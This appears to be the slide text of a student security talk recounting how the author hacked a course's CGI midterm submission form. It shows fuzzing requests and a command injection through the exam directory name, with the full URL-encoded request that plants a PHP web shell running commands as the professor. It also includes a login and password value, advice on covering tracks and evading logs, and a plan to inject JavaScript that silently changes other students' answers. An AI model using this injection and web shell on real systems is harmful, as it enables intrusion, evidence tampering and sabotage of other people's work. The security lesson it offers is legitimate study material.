About Me

UCCS – B. S. Computer Engineering ’05 UCCS – M.E.I.A ever since

Just need to finish project :(

iCTF (International Cyber War Games) Going on 4th year with UCCS

The MITRE Corporation Beautiful Girlfriend Kelly Interests in RE, etc.

Intro

Actually hacked the Review Assume actual test just like review

No source code Locked Down

Already have read access to most things (shell access) Other people’s midterms, etc. Misc auth files Do we even need to hack it? Maybe … What’s out

goal?

http://cs.uccs.edu/~cs502/CS502M2008midterm.html

How does the midterm work? Fill out form and press Submit

Username Password Answers

Form checks credentials Save’s midterm to disk Emails midterm to Dr. Chow and

User

The Midterm

On Submit

Echo’s out everything submitted

and at the bottom of the screen…

name=exam, value=CS502M2008midterm

class=CS502, year=2008, semester=M2008 term=midterm

open filename=CS502M2008Grade.txtlogin incorrect!

What we do know

Form is .cgi Probably Perl

Form check’s authentication in file: CS502S2008Grade.txt

/users/server/faculty/chow/public_html/cgi-bin/grade/CS502S2008Grade.txt

Said so (in lesser words) on the web page

Assumptions: Potentially grepping username file for valid

credentials Probably using Perl’s open command

What we do know (cont.)

Exams are saved here: .../public_html/cgi-bin/grade/CS502/

CS502M2008midterm/

Exams saved in the format: exam_username_108_7_date

First Thought

Probably doesn’t check input values from CS502S2008Grade.txt Why would you, it’s trusted?

Exploit the trusted If we could potentially change a username in

there might be able to exploit unchecked variables

If a file is echo’ed out with unchecked names, we could execute arbitrary system commands

Finding out more

Just hitting Submit (Empty exam) posts the following: exam=CS502M2008midterm&name=&login=&pass

wd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=

Why does it send: CS502M2008midterm? Probably written to be generic

Returns: name=exam, value=CS502M2008midterm class=CS502, year=2008, semester=M2008

term=midterm open filename=CS502M2008Grade.txt login incorrect!

Modifying Requests

Empty exam omitting CS502M2008midterm : exam=CS502M2008midterm&name=&login=&pa

sswd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=

Sending no exam parameter Change to exam=&name=&login=…

Returns name=exam, value= class=, year=, semester= term= open filename=Grade.txt login incorrect!

Modifying Requests (cont.) Send the following (fuzzing)

exam=abcdefghicjklmnopqrstuvwxyz&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=

Returns name=exam,

value=abcdefghicjklmnopqrstuvwxyz class=abcde, year=ghic, semester=fghic

term=jklmnopqrstuvwxyz open filename=abcdefghicGrade.txt login incorrect!

Assumptions First 10 letters of exam is appended to Grade.txt

authentication file 10 letters is not a lot to work with Probably does a split of exam[1..10]

*Grade.txt

First thought, try to change location of Grade.txt If we control it, we control potentially

unchecked input Assumptions

Probably issuing the following command open “~chow/…/” + $10char + Grade.txt This would prevent from using /tmp because of

the leading file path /tmp/abcGrade.txt

This may be an avenue but found other solution so stopped pursuing this

Split Exam Input Value into two Parameters Exam value appears somewhere else

../ public_html/cgi-bin/grade/CS502/CS502M2008midterm/*exams

First 10 character CS502M2008 appended to Grade.txt CS502M2008Grade.txt

Why do we upload the entire string CS502M2008midterm???

CS502M2008midterm

Since CS502M2008 is used for authentication we should leave this alone

Let’s modify midterm and see what it does… Change exam=CS502M2008midterm to

exam=CS502M2008blah Unauthenticated it creates a directory:

../ public_html/cgi-bin/grade/CS502/CS502M2008blah

Authenticated it creates a directory CS502M2008blah and writes out exam and then emails Don’t think I actually ever did this authenticated

If Authenticated

If folder for this midterm doesn’t exist, create it

Upload Exam to folder Email Out copy to Dr. Chow and me

Assumptions Code maybe calls a mkdir or users perl to create

the directory Probably uses perl to write out the file Probably not writing socket code to do a SMTP

call

Email Out

How does this work?

Email Out

Probably something like this: exec(

mail -s exam chow@chow.edu $user@uccs.edu < $dir_to_exam/$exam )

Probably doesn’t check the $dir_to_exam Why would a directory name contain malicious

content? Can’t change $exam ($exam ~= $user_name)

and we can’t change $user_name w/o modifying *Grade.txt

But we can modify $dir_to_exam!!!! Our fuzzing even showed it could be any length

Authenticated vs. Unauthenticated Regardless of authentication a

directory is created Creating directories doesn’t do very

much for us

Only if authenticated with it run the mail program command

Execute My Command

Modify the following: exam=CS502M2008midterm&name=&login=

&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=

To: exam=CS502M2008COMMAND&login=_LOGI

N_&passwd=_PASSWD_ Note: if we don’t login correctly, the mail

program won’t get executed By keeping CS502M2008 the system will

use CS502M2008Grade.txt to authenticate us We (I) have (had) a username in this file

New Request

Need help encoding URLs: http://www.w3schools.com/TAGS/

ref_urlencode.asp

Let’s upload the following command: & echo "<?php exec(\$_GET['command']); ?>" >

a.php & %26+echo+%22%3C%3Fphp+exec%28%5C

%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26

exam=CS502M2008%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26&login=mgersch2&passwd=111-22-3333

Last Request

exam=CS502M2008%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26&login=mgersch2&passwd=111-22-3333

Creates a directory called: CS502M2008& echo "<?php exec(\

$_GET['command']); ?>" > a.php &

Mail Program

Assumption exec(

mail -s exam chow@chow.edu $user@uccs.edu < $dir_to_exam/$exam )

Is now turned into: exec(

mail -s exam chow@chow.edu $user@uccs.edu

< & echo "<?php exec(\$_GET['command']); ?>" > a.php & /$exam )

Successfully create …/grade/a.php that takes commands and runs them as Dr. Chow

Conclusions

Consequently, this hack appears to never send out an email – Dr. Chow is never notified that it was hacked Or does it? It doesn’t, verified.

Logs usually only show GETs, not POSTs Clean up directories we’ve create and we’ve covered our

tracks

Using the a.php to upload commands uses GETs. Everything is probably logged there Can easily change this to POSTs

Probably a wise idea to secure anything that remotely looks like a production system.

Backups

Evil Things to Do

Average test may take ~30+Minutes

Injecting JS that every 5-10 minutes, picks a multiple choice question and changes the answer Slow enough which people may not notice

the change If the user prints out a copy, hard copy will

be wrong too

Goal: Lower everyone else's test scores by some reasonable amount to put yourself at the top of the curve

IDS

IDS probably could not have stopped this Least not initially

This is a security test therefore answers that would normally be acceptable, IDS might throw away i.e. how would you hack this site